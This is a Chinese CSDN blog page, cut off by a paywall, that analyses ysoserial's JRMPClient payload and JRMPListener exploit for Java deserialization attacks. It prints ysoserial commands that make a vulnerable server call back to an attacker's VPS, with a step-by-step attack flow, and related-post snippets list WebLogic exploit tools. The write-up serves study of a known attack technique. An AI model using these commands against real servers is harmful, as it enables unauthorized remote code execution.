jrmp协议_ysoserial JRMP相关模块分析(二)- payloads/JRMPClient & exploit/JRMPListener

最新推荐文章于 2022-01-26 16:24:40 发布
最新推荐文章于 2022-01-26 16:24:40 发布
阅读量661 收藏
点赞数
文章标签: jrmp协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39876145/article/details/111969411
版权

简介

payloads/JRMPClient 生存的 payload 是发送给目标机器的,exploit/JRMPListener 是在自己服务器上使用的,payloads/JRMPClient 的利用,离不开 exploit/JRMPListener ,反之 exploit/JRMPListener 的利用,在上篇文章中,它是可以独立使用的

这篇文章是记录 payloads/JRMPClient 的分析流程,还会结合 exploit/JRMPListener 一起分析

利用流程

网上见到的利用方式:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollecitons1 'calc.exe'

java -jar ysoserial.jar JRMPClient 'vpsIP:PORT' > vulrServer

这个payloads/JRMPClient 是结合 exploit/JRMPListener 使用的(还没看exploit/JRMPClient)

在自己的 vps 上挂起 exploit/JRMPListener (可自定义反序列化 payload)。

将 payloads/JRMPClient 生成的 payload (指定自己vps的IP和端口)发送到漏洞服务器上,反序列化时,将会根据 JRMP 协议反向连接 vps ,在通信的同时,vps 会将指定好的payload 序列化后再次发送到漏洞服务器上,利用正在与 vps 上 exploit/JRMPListener 通信的 JRMPClient 第二次反序列化 vps 发送过来的payload,从而造成 RCE

攻击流程:

vps 跑起 exploit/JRMPListener ,并指定生成 payload1

2.向漏洞服务器发送 payloads/JRMPClient 生成的 payload2

3.漏洞服务器反序列化 payload2

4.反序列化 payload2 的过程中,将会与 exploit/JRMPListener 进行通信

5.exploit/JRMPListener 自定义了来自任意 JRMP client 的通信处理流程,会将 payload1 返馈给漏洞服务器

6.漏洞服务器会根据 exploit/JRMPListener 设计的通信处理流程,进一步反序列化 payload1

7.payload1 中包含了 RCE 的gadget构造,最终在漏洞服务器上执行任意代码

payload1 中主要利用通用库比如 commons-collections 等

payload2 中主要利用漏洞服务器自带的 jre 中绝对含有的 RMI 相关的gadget

(payload2需要满足两个条件,1:反连vps ,2:第二次反序列化)

(但是和利用漏洞服务器已经开启 RMI server 的 RMI gadget 不同(原理差不多࿰

最低0.47元/天 解锁文章
weixin_39876145
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ysoserial之JRMP源码分析(payloads.JRMPClient/exploit.JRMPListener)
weixin_45682070的博客
03-11 1348
前言 本来是想复现weblogicCVE-2017-3248漏洞的,这个漏洞使用了ysoserial的jrmp模块,开启rmi监听进行通信的,达到执行任意反序列化 payload。下文有些概念比较晦涩难懂,建议查阅其他资料配合使用。 JRMP协议是什么 JRMP全称为Java Remote Method Protocol,也就是Java远程方法协议。 一个RMI的过程,是用到JRMP这个协议去组织数据格式然后通过TCP进行传输,从而达到RMI,也就是远程方法调用。 JRMP是一个协议,是用于Java RMI
ysoserial payloads/JRMPClient
洋洋的小黑屋
07-27 499
ysoserial payloads/JRMPClient 环境:JDK8u102 payloads/JRMPClient可以配合exploit/JRMPListener模块来使用 1.在自己服务器上使用exploit/JRMPListener来开启监听 2.把payloads/JRMPClient发送给对方服务器,对方服务器反序列化后会反向连接我们的服务器,进行连接之间我们服务器会发送payload给对方服务器进行反序列化执行命令。 以下是执行ysoserial时候使用的命令: java -cp ysos
Java远程方法协议(JRMP)
weixin_34186128的博客
07-31 1353
Java远程方法协议(英语:Java Remote Method Protocol,JRMP)是特定于Java技术的、用于查找和引用远程对象的协议。这是运行在Java远程方法调用(RMI)之下、TCP/IP之上的线路层协议JRMP是一个Java特有的、适用于Java之间远程调用的基于流的协议,要求客户端和服务器上都使用Java对象。    ...
ysoserial exploit/JRMPClient
洋洋的小黑屋
07-27 323
ysoserial exploit/JRMPClient 上一篇文章讲到,当服务器反序列化payloads/JRMPListener,即会开启端口监听。再使用exploit/JRMPClient模块发送payload,服务器就会把payload进行反序列化,从而完成进行攻击。 调用链分析 设置payloads/JRMPListener参数,端口号为1299,debug模式启动payloads/JRMPListener模块。 设置exploit/JRMPClient模块设置参数为127.0.0.1 1299
jrmp协议_Java远程方法调用RMI利用分析
weixin_28358083的博客
12-24 583
前提了解JNDIJNDI(Java Naming and Directory Interface,Java命名和目录接口)是SUN公司提供的一种标准的Java命名系统接口,JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现,由管理者将JNDI API映射为特定的命名服务和目录系统,使得Java应用程序可以和这些命名服务和目录服务之间进行交互。JRMPJav...
WebLogic最新漏洞利用工具
06-21
支持漏洞: CVE-2023-21931 (JNDI) CVE-2023-21839(JNDI) CVE-2020-2551(JRMP) CVE-2020-2551 ...java -cp ./ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsCollections3 'touch /tmp/1.txt'
rmi-jndi-ldap-jrmp-jmx-jms:rmi,jndi,ldap,jrmp,jmx,jms一些演示测试
03-08
rmi-jndi-ldap-jrmp-jmx-jms rmi,jndi,ldap,jrmp,jmx,jms一些演示测试
迫于目前现有的weblogic工具没怎么更新、payloayjdk适用版本等问题,所以基于superman18、sp4zcmd等
最新发布
01-28
CVE-2020-2551(JRMP) CVE-2020-2551 CVE-2020-2555 CVE-2020-2883 CVE-2020-14882 未授权访问 CVE-2018-2894 CVE-2018-2628(JRMP) CVE-2018-2893(JRMP) CVE-2018-3245(JRMP) CVE_2018_3252(JRMP) CVE_2018...
CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警
07-19
该漏洞通过 JRMP 协议利用 RMI 机制的缺陷达到执行任意反序列化代码的目的。攻击者可以在未授权的情况下将 payload 封装在 T3 协议中,通过对 T3 协议中的 payload 进行反序列化,从而实现对存在漏洞的 WebLogic ...
weblogicscan
09-23
您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束” 支持最近的CVE-2023-21839漏洞T3&&IIOP,JNDI和JRMP类型漏洞需要填写自定义的dnslog地址,防止waf拦截常用的...
JRMP
weixin_30432579的博客
12-21 243
JRMP: Java Remote Messaging Protocol Java远程消息协议是专为Java语言定制的基于流的协议,主要用于查找和引用远程对象。该协议运行在TCP/IP协议之上,RMI协议之下。由于是Java专有协议JRMP要求客户端与服务器端都使用Java语言。 与之对应的RMI-IIOP协议,将Java对象暴露给CORBA ORB。 其他参考: http:/...
ysoserial exploit/JRMPClient原理剖析
hldfight
03-15 2855
0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是: 1、先往存在漏洞的服务器发送payloads/JRMPLIstener,使服务器反序列化该gadget后,会开启一个rmi服务并监听在设置的端口 2、然后攻击方在自己的服务器使用exploit/JRMPClient与存在漏洞的服务器...
jrmp协议_从0学习WebLogic CVE20202551漏洞
weixin_33796288的博客
01-14 228
最近遇到的实际环境为weblogic,所以这里顺便总结下测2020-2551的一些相关的点2551也是学习了很多优秀的师傅文章,非常感谢0X00 漏洞利用基础学习从0开始学习复现这个洞不免又会设计到Java反序列化漏洞中那些老生常谈的名词理解,涉及到Java反序列化中的一些协议、行为、结构,但个人文中偏向于结果导向,对于涉及的上述名词解释不会过多官方解释,直接说上自己认为最简单的理解,如有偏差望师...
ysoserial exploit/JRMPListener原理剖析
hldfight
03-19 2246
ysoserial exploit/JRMPListener原理剖析0 前言1 payloads/JRMPClient1.1 Externalizable1.2 生成payload1.3 gadget链分析2 exploit/JRMPListener3 总结 0 前言 上一篇文章讲了ysoserial exploit/JRMPClient的原理,本篇接着讲一下ysoserial exploit/J...
java 反序列化 ysoserial exploit/JRMPClient 原理剖析
whatday的专栏
06-26 3254
目录 0 前言 1payloads/JRMPListener 1.1 payload生成 1.2gadget链分析 2使用RMIRegistryExploit攻击上述开启的监听 3 exploit/JRMPClient 3.1分布式垃圾收集(DGC) 3.2exploit/JRMPClient代码分析 4 总结 0 前言 ysoserial中的exploit/JRMPClient是作为攻击方的代码,一般会结合payloads/JRMPLIstener使用,攻击流程就是:...
Java RMI、JRMP详解
糖小喵
05-11 1504
RMI 远程方法调用(Remote Method Invocation)。能够让在某个java虚拟机上的对象像调用本地对象一样调用另一个java 虚拟机中的对象上的方法。 Java远程方法调用,即Java RMI(Java Remote Method Invocation)是Java编程语言里,一种用于实现远程过程调用的应用程序编程接口。它使客户机上运行的程序可以调用远程服务器上的对象。远程方法调用特性使Java编程人员能够在网络环境中分布操作。RMI全部的宗旨就是尽可能简化远程接口对象的使用。 J
java 反序列化 ysoserial exploit/JRMPListener 原理剖析
whatday的专栏
06-26 1651
目录 0 前言 1 payloads/JRMPClient 1.1 Externalizable 1.2 生成payload 1.3 gadget链分析 2 exploit/JRMPListener 3 总结 0 前言 上一篇文章讲了 《java 反序列化 ysoserial exploit/JRMPClient 原理剖析》 https://blog.csdn.net/whatday/article/details/106971531 ,本篇接着讲一下ysoserial expl.
JRMPClient 反序列化
01-26 844
JRMPClient 反序列化 当目标存在反序列化入口时,可以尝试构造反序列化链让目标在指定端口开启 JRMP 服务,这样我们就可以连接目标开启的 JRMP 服务进行一些后续操作。 Gadget /* * Gadget: * UnicastRemoteObject#readObject * UnicastRemoteObject#reexport * UnicastRemoteObject#exportObject * UnicastRemoteObject
jrmp协议_Weblogic CVE20202551 IIOP协议反序列化RCE
weixin_34289350的博客
12-12 444
IIOP协议导致的反序列化。环境weblogic10.3.6+jdk1.6idea+jdk1.8+jdk1.6IIOPIIOP,Internet Inter-ORB Protocol(互联网内部对象请求代理协议),它是一个用于CORBA 2.0及兼容平台上的协议;用来在CORBA对象请求代理之间交流的协议。Java中使得程序可以和其他语言的CORBA实现互操作性的协议。RMI-IIOP出...
error during JRMP connection establishment; nested exception is: java.net.SocketTimeoutException: Read timed out]
10-12
JRMP(Java Remote Method Protocol)是Java中用于远程方法调用的协议,而这个错误提示表明在建立JRMP连接时出现了超时错误。可能的原因包括网络延迟、防火墙设置等。 为了解决这个问题,可以尝试以下几个步骤: 1...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值